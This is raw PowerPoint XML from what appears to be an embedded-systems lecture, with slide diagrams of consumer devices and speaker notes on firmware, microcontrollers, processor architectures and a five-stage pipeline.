          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1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0B5B03-FFB4-4849-AD47-BF1375281454}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4171860"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Washing Machine</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4171860" y="3433802"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B47C8FBE-8F95-46F4-B293-20B926AAC3A8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5426716" y="2647836"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1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115EBC-E00B-4E8C-8325-159702624E53}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5426716"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Microwave Oven</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5426716" y="3433802"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{22B78B36-C024-49A1-9C8E-01EB114322B6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6681573" y="2647836"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1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6328-E8B0-4B36-AD2E-744E6E96CB78}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6681573"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Set Top Box</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6681573" y="3433802"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0F0AEB94-8C0B-4BFD-8D19-E323AFA5101B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1662148" y="3971089"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId19"/>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10984D-4B1A-40EB-97BE-95AAD11F6E41}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1662148"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Television Set</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1662148" y="4757055"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DB2C5316-CD6C-44F4-991D-0DCFD2FC4A94}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2917004" y="3971089"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId20"/>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A065E-62C9-40D4-B48E-4EF875F2A0C4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2917004"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Smartphone</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2917004" y="4757055"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7E8157B3-D520-4028-8754-5BE654019855}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4171860" y="3971089"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2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C1E79-8A0E-4218-A50D-77E141A90E6E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4171860"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Digital Camera</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4171860" y="4757055"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F9F8E482-7DA1-4191-A748-B1C924B9A687}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5426716" y="3971089"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2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F9C8D5-820C-43B5-A953-ABA1F58CC315}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5426716"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Navigation System</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5426716" y="4757055"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.emf"/><Relationship Id="rId4"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8FA58F-8E7F-4660-9656-F9A2F0BF5519}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/24/2013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FDDE89-5AB5-461E-9FFB-0673BE3CC888}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236344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4595F7C4-DD2E-4C59-BFD3-FC755C1882DF}" type="slidenum">
              <a:rPr lang="en-US" sz="1300" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="130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he-IL" dirty="0" err="1" smtClean="0"/>
              <a:t>קושחה</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firmware between SW and HW:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Executed by a microprocessor, software methodologies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Tightly coupled with hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>changeability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>C + ASM:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Allows fine-tuning and optimization, along with complex programmatic constructs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>availability of Compilers and tools for C++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Generated performance / size of C++ programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Generated performance / size of Java programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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DF2092BC-A91D-4AC4-AAAE-69901F741B92}" type="slidenum">
              <a:rPr lang="en-US" sz="1300" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="130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Distinction on severity of consequences</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5BAFDD99-71FB-4417-A9E8-9C3649A2DEE8}" type="slidenum">
              <a:rPr lang="en-US" sz="1300" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1300"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dirty="0" smtClean="0"/>
              <a:t>Compilation and build processes – an art of its own! In “regular” systems – you learned one, you learned the all. In many cases not enough tools exist for the processor / compiler / debugger. Less debugged tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Operating systems – as expert programmers, i.e. understand threading, locks, semaphores, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0"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946B0050-BF51-4830-8D56-950AFCA13797}" type="slidenum">
              <a:rPr lang="en-US" sz="1300" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="130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0936CD1-B4DC-4665-AABA-31FAAA72ADF2}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4573588" cy="3430588"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31748" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685494" y="4344357"/>
            <a:ext cx="5487013"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Microprocessor as the heart of the system, bunch of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hardware devices </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>that surround it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr 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In general, names are interchangeable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Micro controller has integrated memory / devices – may include the entire embedded system on a single chip. Reduces cost and size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DSP is typically associated with a specifically tailored processor, in many cases one that is used for analog processing (audio, video)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Von Neumann – code and data may be together,  Harvard – separate storage</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6AB277D-A614-467A-8F1B-157F31ECBEEE}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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E71C8A5-0BAB-4C67-B6B6-FC837D1DE659}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="12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0AE8805-A10B-403D-ACBB-8B6E5289C622}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819"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4820"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4821"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4822"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5046B487-2623-4BDA-ABB5-4F059C6C0234}" type="slidenum">
              <a:rPr lang="en-GB" sz="1200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" sz="1200">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34823" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127125" y="704850"/>
            <a:ext cx="4583113" cy="3436938"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34824" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926259" y="4351449"/>
            <a:ext cx="4993213" cy="41443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38" tIns="43820" rIns="87638" bIns="43820"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1376031" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Five pipeline stages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1376031" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1000" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1376031" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Instruction fetch (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)	Instruction fetch from the Instruction cache or the Code RAM and 16/32 instruction resolution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1376031" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Decode (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)	Instruction decode and operand address extraction and program counter update for B/Bcc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1376031" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Register File (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)	Register File access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1376031" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Execute (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)	ALU and instruction execution, load return path from the Data cache or main memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1376031" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Write Back (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)	Result/load register-file write back and branch-and-test resolution </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1376031" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1000" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1376031" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The pipeline is fully static using a single clock domain (rising clock edge active only).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Parameters in r0, r1, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Short commands vs. long commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Delay slot in jump instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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163064D-C798-4B61-B85D-FCE2119147F7}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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97A827F-4DA0-4FB7-BADE-28AE494A4F26}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867"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6868"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6869"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687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8871068D-586E-46E0-B5F9-4AF9F03F5C5D}" type="slidenum">
              <a:rPr lang="en-GB" sz="1200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" sz="1200">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36871" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147763" y="688975"/>
            <a:ext cx="4570412" cy="3427413"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36872" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915525" y="4344358"/>
            <a:ext cx="5026951" cy="4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GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ultiple instructions can be fetched in a single cycle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
